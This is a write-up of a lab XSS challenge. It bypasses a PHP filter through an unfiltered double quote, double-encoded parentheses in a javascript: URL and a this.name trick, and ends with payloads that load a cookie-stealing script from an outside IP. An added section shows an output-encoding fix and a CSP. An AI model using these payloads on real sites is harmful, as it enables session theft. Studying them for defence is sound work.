[XSS] Bypassing a filter that strips parentheses and angle brackets

First, roughly what the program looks like:

<?php
header("X-XSS-Protection:0");          // browser XSS auditor disabled
$out = $_GET['code'];                  // user input, decoded once by PHP
$out = str_replace("<","&lt;",$out);   // angle brackets are entity-encoded
$out = str_replace(">","&gt;",$out);
$out = str_replace("("," ",$out);      // parentheses and single quotes are
$out = str_replace(")"," ",$out);      // replaced with spaces; the double
$out = str_replace("'"," ",$out);      // quote is never touched
echo "<html>
<body>
<input value=\"$out\">
</body>
</html>";
?>

The angle brackets are encoded first, so the input tag cannot be closed; note, however, that the double quote is not filtered here, which is enough to break out of the value attribute.

http://192.168.192.120:8080/1.php?code=1" autofocus onfocus=alert(1) x="

The output source is as follows:

<input value="1" autofocus onfocus=alert 1  x="">

Because parentheses are filtered, no popup fires. Consider bypassing this with URL-encoded parentheses inside a location assignment: PHP decodes %2528 once to %28 when it parses the query string, so the filter never sees a parenthesis, and the browser decodes it a second time when it navigates to the javascript: URL.

http://192.168.192.120:8080/1.php?code=1" autofocus onfocus=location='javasCript:alert%25281%2529' x="

But single quotes are filtered here, so we switch to double quotes:

http://192.168.192.120:8080/1.php?code=1" autofocus onfocus=location="javasCript:s=document.createElement%2528%2522script%2522%2529;s.src=%2522//120.92.84.50/myjs/cookie.js%2522;document.body.appendChild%2528s%2529;" x="

Alternatively, pass the payload in via this.name, modified as follows:

http://192.168.192.120:8080/1.php?code=1" name=javasCript:alert%25281%2529 autofocus onfocus=location=this.name x="

The popup now fires; the same route then loads an external JS file to read the cookie.

http://192.168.192.120:8080/1.php?code=1" name=javasCript:s=document.createElement%2528"script"%2529;s.src="//120.92.84.50/myjs/cookie.js";document.body.appendChild%2528s%2529; autofocus onfocus=location=this.name x="
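The root cause behind every variant above (attribute breakout, the double-encoded parentheses in location, and the this.name trick) is the same: the page blacklists a few characters instead of encoding the value for the HTML attribute context it lands in, and the double quote that actually closes the attribute was never on the list. The following is an added example, not code from the original post, that puts the post's blacklist next to an output-encoding fix and checks both against the post's own payloads. The function names render_blacklist(), render_encoded() and attribute_intact() are assumptions made for this illustration.

```php
<?php
// Added example (not from the original post): the post's character blacklist
// beside an output-encoding fix. Function names are assumptions for this demo.

// The original filter: replaces < > ( ) ' but leaves the double quote alone,
// so a value like  1" autofocus onfocus=...  still escapes from value="...".
function render_blacklist(string $code): string {
    $out = str_replace(["<", ">"], ["&lt;", "&gt;"], $code);
    $out = str_replace(["(", ")", "'"], " ", $out);
    return "<input value=\"$out\">";
}

// The fix: encode for the HTML attribute context. ENT_QUOTES turns both ' and "
// into entities, so the attribute cannot be closed early regardless of which
// characters a blacklist forgot; stripping individual characters is no longer
// needed, and benign input such as f(x) survives intact.
function render_encoded(string $code): string {
    $out = htmlspecialchars($code, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return "<input value=\"$out\">";
}

// Check used by this demo: the rendered markup must consist of exactly one
// attribute with the user value confined to it. A raw double quote followed by
// extra attribute names means the value broke out of the attribute.
function attribute_intact(string $html): bool {
    return preg_match('/^<input value="[^"]*">$/', $html) === 1;
}

// Constructed input: the post's payloads as PHP sees them after the web
// server's single round of URL decoding (the %2528 in the URL reaches $_GET
// as %28, so the filter is looking for a "(" that is not there).
$payloads = [
    '1" autofocus onfocus=alert(1) x="',
    '1" autofocus onfocus=location=\'javasCript:alert%281%29\' x="',
    '1" name=javasCript:alert%281%29 autofocus onfocus=location=this.name x="',
    'f(x) = "ok"',   // benign value with parentheses and quotes
];

foreach ($payloads as $p) {
    $blacklisted = render_blacklist($p);
    $encoded     = render_encoded($p);
    printf("blacklist: %s\n   intact=%s\n", $blacklisted, attribute_intact($blacklisted) ? 'yes' : 'no');
    printf("encoded:   %s\n   intact=%s\n\n", $encoded, attribute_intact($encoded) ? 'yes' : 'no');
}
```

Run with `php demo.php`: each of the three payloads leaves the attribute open under the blacklist (intact=no) and stays inside `value="..."` once encoded with ENT_QUOTES (intact=yes), while the benign `f(x) = "ok"` is preserved rather than mangled. A second layer worth adding in a real deployment is a Content-Security-Policy header without `'unsafe-inline'` and with script-src restricted to the site's own origin, which refuses both the javascript: navigation and the external script load the post ends with.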

Reference:
https://www.secpulse.com/archives/47696.html